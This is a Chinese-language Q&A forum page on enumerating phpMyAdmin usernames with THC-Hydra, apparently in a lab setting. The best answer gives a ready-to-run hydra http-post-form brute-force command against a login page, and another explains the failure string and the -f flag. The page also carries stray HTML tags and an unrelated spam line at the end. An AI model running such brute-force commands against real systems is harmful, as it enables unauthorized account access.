<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    怎么通過 THC-Hydra 查找用戶名

    怎么通過THC-Hydra查找用戶名


    發現錯別字 2年前 提問
    回答
    3
    瀏覽
    282
    請勿發布不友善或者負能量的內容。與人為善,比聰明更重要!
    CISAW安全運維(專業級) 高級信息系統項目管理師
    最佳答案 1人贊同此回答

    通過THC-Hydra查找PhpMyAdmin用戶名。登錄頁面代碼為:

                <label for="input_username">Username:</label>
                <input type="text" name="pma_username" id="input_username" value="" size="24" class="textfield">
            </div>
            <div class="item">
                <label for="input_password">Password:</label>
                <input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield">

    用下面的命令:

    $ hydra -L /usr/share/dict/cracklib-small -p 123 192.168.56.5 http-post-form '/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^:incorrect'

    回答所涉及的環境:聯想天逸510S、Windows 10。

    2年前 / 評論
    回答數量: 3
    CISAW CISP-PTE

    通常默認情況下,SQL Server僅允許從本地主機登錄

    回答所涉及的環境:聯想天逸510S、Windows 10。

    2年前 / 評論
    CISP-PTE CISM-WSE

    在嘗試了用戶名/密碼組合后,如果響應中不包含單詞“ incorrect”,那么hydra認為該用戶名/密碼組合是正確的。

    “登錄失敗”頁面可能不包含您提供的“失敗字符串”,而hydra最終認為所有組合的身份驗證均成功。
    整理,
    檢查登錄失敗頁面是否具有此關鍵字
    添加該-f標志,以使hydra在第一次成功嘗試時終止。

    回答所涉及的環境:聯想天逸510S、Windows 10。

    2年前 / 評論
    亚洲 欧美 自拍 唯美 另类